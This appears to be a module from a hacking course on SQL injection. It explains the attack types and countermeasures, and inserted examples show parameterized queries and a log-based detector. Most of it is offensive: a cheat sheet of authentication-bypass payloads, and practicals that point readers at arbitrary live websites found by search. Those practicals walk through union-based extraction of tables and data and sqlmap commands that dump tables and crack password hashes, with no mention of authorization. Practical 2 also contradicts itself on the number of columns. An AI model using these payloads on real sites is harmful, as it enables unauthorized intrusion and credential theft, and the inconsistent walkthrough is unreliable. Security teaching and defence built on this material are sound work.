15. SQL Injection

The document provides an overview of SQL (Structured Query Language) and its role in database management, detailing its functions and the relationship between web servers and database servers. It discusses SQL injection attacks, including authentication bypass, error-based, and blind SQL injection, along with countermeasures to prevent such vulnerabilities. Additionally, it includes practical exercises on performing SQL injection using various tools and techniques.


www.hackerschool.in
SQL
SQL (Structured Query Language) is a database management language used to
manage databases and to perform operations such as create, read, update and
delete on the data they hold. SQL is used by database administrators as well as
developers to organize user data properly. Web applications interact with the
database server in the form of queries. SQL queries include select, add, insert,
update, delete, create, alter and truncate.

List of Database software

● MySQL
● Microsoft SQL
● Oracle
● MongoDB
● SQLite
● Microsoft Access
● DB2 Express-C

Database
A database is a collection of information that is organized into rows, columns and
tables, and it is indexed so that it can be easily accessed, managed and updated.
Data in the database is updated, expanded and deleted as new information is
added.

The relation between the web server and the database server

A server is software that runs continuously and responds to requests sent by
clients; communication between a client and a server uses a specific protocol, for
example HTTP or HTTPS. A server running a web application includes three
components:
Web servers, which primarily respond to HTTP/HTTPS requests sent by the
clients and pass these requests on to handlers.
The application server, which handles requests to create dynamic web pages.
Instead of serving a static HTML page stored on disk, the application server
processes the user's request to generate the HTML page for the end user. The
application server software usually runs on the same physical machine as the web
server.
The database server, which houses a database application (reached through
interfaces such as JDBC or ODBC) to provide database services to other computer
programs. Most database applications respond to a query language: each database
understands its own query language, converts each submitted query to a
server-readable form and executes it to retrieve results.
The relation between the web server and the database server is that the web
server uses the application server to retrieve data from the database and presents
that data through the web application. The web server therefore works as the
front end, and the database server works as the back end that provides data to the
web server.

SQL Injection
SQL injection is a technique that takes advantage of non-validated input to pass
SQL commands through a web application for execution on the backend database,
retrieving information directly from the database. It is used to gain unauthorized
access to the database. SQL injection is not a vulnerability in the database or the
web server; it is a vulnerability in the web application, which arises from a lack of
input validation.

Types of SQL Injection attacks

● Authentication bypass attack
● Error-based SQL Injection
● Blind SQL Injection

Authentication bypass attack
The attacker uses this technique to bypass user authentication without providing
a valid username and password, and tries to log into the web application with
administrative privileges.

Authentication Bypass Cheat Sheet

● 1' or '1' = '1
● or 1=1
● or 1=1--
● or 1=1#
● or 1=1/*
● admin' --
● admin' #
● admin'/*
● admin' or '1'='1
● admin' or '1'='1'--
● admin' or '1'='1'#
● admin' or '1'='1'/*
● admin' or 1=1 or ''='
● admin' or 1=1
● admin' or 1=1--
● admin' or 1=1#
● admin' or 1=1/*
● admin') or ('1'='1
● admin') or ('1'='1'--
● admin') or ('1'='1'#
● admin') or ('1'='1'/*
● admin') or '1'='1
● admin') or '1'='1'--
● admin') or '1'='1'#
● admin') or '1'='1'/*

Error-based SQL Injection

Error-based SQL injection relies on the error messages returned by the database
server to obtain information about the structure of the database. In some cases,
error-based SQL injection alone is enough for an attacker to enumerate an entire
database. While detailed errors are very useful during the development phase of a
web application, they should be disabled on a live site, or logged to a file with
restricted access instead. By analyzing these errors, an attacker can learn system
information such as the database in use, its version, the operating system, etc.

Blind SQL injection
Blind SQL injection is a type of SQL injection attack that asks the database
true-or-false questions and determines the answer from the application's response.
It is often used when the web application is configured to show generic error
messages but the code that is vulnerable to SQL injection has not been fixed. Blind
SQL injection is nearly identical to normal SQL injection; the only difference is the
way the data is retrieved from the database.

Countermeasures
● Never trust user input. Sanitize and validate all input fields. Use
parameterized statements, which keep data separate from SQL code.
● Reject entries that contain binary data, escape sequences or comment
characters.
● Check the privileges of the user's connection to the database.
● Use secure hash algorithms to protect user passwords stored in the database.
● Perform a source code review before hosting the website.
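The first countermeasure (parameterized statements) and the cheat sheet payloads are put side by side here in an added example that is not part of the original document: a login check built by string concatenation next to the same check written with placeholders, using Python's sqlite3 against a constructed in-memory users table. The payload admin' -- is taken from the cheat sheet; the account name and password are made up for the example.

```python
"""Login check: string-built SQL beside its parameterized form (added example,
not from the original document; the users table and account are constructed)."""
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: one account. A real deployment would store a
    salted password hash (bcrypt, scrypt); sha256 keeps the example dependency-free."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("admin", hashlib.sha256(b"correct-horse").hexdigest()))
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Input is spliced into the SQL text, so a quote plus a comment marker in the
    username closes the string and comments out the password check entirely."""
    digest = hashlib.sha256(password.encode()).hexdigest()
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password_hash = '" + digest + "'")
    return conn.execute(query).fetchone() is not None


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same check with placeholders: the driver passes the values separately from
    the SQL text, so the username is only ever compared as data, never parsed."""
    digest = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, digest),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' --"  # entry from the cheat sheet above
    print("string-built query:", login_vulnerable(db, payload, "wrong"))     # True
    print("parameterized query:", login_parameterized(db, payload, "wrong"))  # False
```

With the payload in the username field the concatenated query collapses to SELECT username FROM users WHERE username = 'admin', while the parameterized version simply finds no such user.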

INDEX
S. No. Practical Name Page No.
1 SQL Injection Authentication Bypass Method 1
2 Error-based SQL Injection 2
3 Performing SQL Injection with SQL map tool 7
4 Performing SQL Injection with JSQL tool 10

THIS DOCUMENT INCLUDES ADDITIONAL PRACTICALS WHICH MAY OR MAY NOT BE COVERED DURING
CLASSROOM TRAINING. FOR MORE DETAILS APPROACH LAB COORDINATORS
Practical 1: SQL Injection Authentication Bypass Method
Description: In this practical you will learn how to bypass the authentication of a web
application that has an SQL injection vulnerability, and the different operators you can
try in order to bypass authentication.

Step 1: Consider any website login page. Enter the string 1' or '1' = '1 in both the
username and password fields. If the target web application is vulnerable to SQL
injection, we gain access to the administrator account.

Practical 2: Error-based SQL Injection
Description: In this practical you will learn how to identify whether a web application
has an SQL injection vulnerability based on the errors it returns when we make a small
change to the URL, and, if the vulnerability is present, how to exploit it to extract
information from the database.

Step 1: We can search for web pages vulnerable to SQL injection using the following
search query
● php?id=

Step 2: Enter a single quote (') at the end of the URL to test the webpage for an SQL
injection vulnerability. If it displays an SQL-related error, it is vulnerable to SQL
injection. Then append order by 1-- to the URL.

Step 3: Increase the number by 1 each time until the webpage loads normally without any
error. We can also try the following technique to identify the number of columns.
● php?id=6' order by 3--+

Step 4: In this case, the website displays an error at order by 7--, which indicates that
there are 6 columns in the database. Now let us identify the vulnerable columns by
appending the query below to the URL.
● union select (list of columns)--
● Example: union select 1,2,3,4,5,6--

Step 5: In this case, we used the following technique to identify the vulnerable columns.
● Example: php?id=-6 union select 1,2,3,4,5,6--

Step 6: From the above result, it is observed that the 3rd and 4th columns are vulnerable.
To learn the version of the database server, replace a vulnerable column number with
version() as shown in the image below.

Step 7: To retrieve database information including table names.
● php?id=-1 union select 1,2,group_concat(table_name),4,5,6,7 from
information_schema.tables where table_schema=database()--

Step 8: To extract the column names
● php?id=-1 union select 1,2,group_concat(column_name),4,5,6,7 from
information_schema.columns where table_name=<table name>

Step 9: The above technique fails to retrieve the expected information, so let us try
encoding the table name instead
● php?id=-1 union select 1,2,group_concat(column_name),4,5,6,7 from
information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Step 10: To retrieve the data from the columns.
● php?id=-1 union select 1,2,group_concat(<column name>),4,5,6,7 from
<table name>--
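Seen from the defender's side, the probing sequence in Steps 2 to 7 (a stray quote, order by N, union select, information_schema) leaves a recognisable trail in web server access logs. The detector below is an added example, not part of the original document: it parses constructed Apache combined-format log lines with placeholder addresses, URL-decodes each query string and tallies which stages of the sequence each client address has attempted.

```python
"""Flag the Practical 2 probing sequence in access logs (added example; the log
lines are constructed, in Apache combined format, with placeholder addresses)."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample log lines (not real traffic); the first client walks the
# sequence from the practical, the second only makes ordinary requests.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /news.php?id=6 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /news.php?id=6%27 HTTP/1.1" 500 612 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:50 +0000] "GET /news.php?id=6%27+order+by+3--+ HTTP/1.1" 500 612 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /news.php?id=-6+union+select+1,2,3,4,5,6-- HTTP/1.1" 200 4870 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:56:30 +0000] "GET /news.php?id=-1+union+select+1,2,group_concat(table_name),4,5,6+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 5011 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:57:05 +0000] "GET /search.php?q=rock+%26+roll HTTP/1.1" 200 3100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# One heuristic per stage of the manual technique. Patterns are applied to the
# URL-decoded query string, so %27 and '+' are normalized before matching.
STAGES = {
    "quote_probe": re.compile(r"'(\s|--|#|$)"),
    "column_count": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
}


def classify(path: str) -> list[str]:
    """Return the stage names whose pattern appears in the decoded query string."""
    if "?" not in path:
        return []
    query = unquote_plus(path.split("?", 1)[1])
    return [name for name, rx in STAGES.items() if rx.search(query)]


def scan(log_text: str) -> dict[str, Counter]:
    """Tally matched stages per client address; clients with no hits are omitted."""
    hits: dict[str, Counter] = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        stages = classify(m["path"])
        if stages:
            hits.setdefault(m["ip"], Counter()).update(stages)
    return hits
```

A client that hits several distinct stages in a short window is a far stronger signal than any single pattern, and the 500 responses on the quote probes are the server-side counterpart of the error messages the practical relies on.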

Practical 3: Performing SQL Injection with the SQLmap tool
Description: In this practical you will learn how to automate the steps that we
performed in the second practical using the SQLmap tool (a terminal-based tool), once
we have identified an SQL injection vulnerability in a web application.

Step 1: Open a terminal and execute the following command.

● Syntax: sqlmap -u <URL of the vulnerable website> --dbs

Step 2: It will check for the SQL injection vulnerability. If the target is vulnerable, it
will identify the database information of the target SQL server.

Step 3: To retrieve the table names from a database, execute the command below
● sqlmap -u <URL of the vulnerable website> -D <database> --tables

Step 4: Next, to extract the columns from a table, execute the following command
● sqlmap -u <URL of the vulnerable website> -D <database> -T <table name>
--columns

Step 5: To extract the content of the selected columns in a table
● sqlmap -u <URL of the vulnerable website> -D <database> -T <table name>
-C <column names> --dump

Step 6: The tool will try a dictionary-based attack on the stored hashes to recover the
plaintext passwords.

Practical 4: Performing SQL Injection with the jSQL tool
Description: In this practical you will learn how to use the jSQL tool, an automated
graphical-interface tool, to perform SQL injection on web applications.

Step 1: Select jSQL from the applications menu. jSQL automates the process of
identifying an SQL injection vulnerability on a website. Provide the URL of a website
vulnerable to SQL injection to start the process of identifying database information.

Step 2: After the extraction of data is complete, select a table to extract its contents as
shown in the image below.

Step 3: We can use the inbuilt Brute force tool to recover passwords from the stored
hashes.
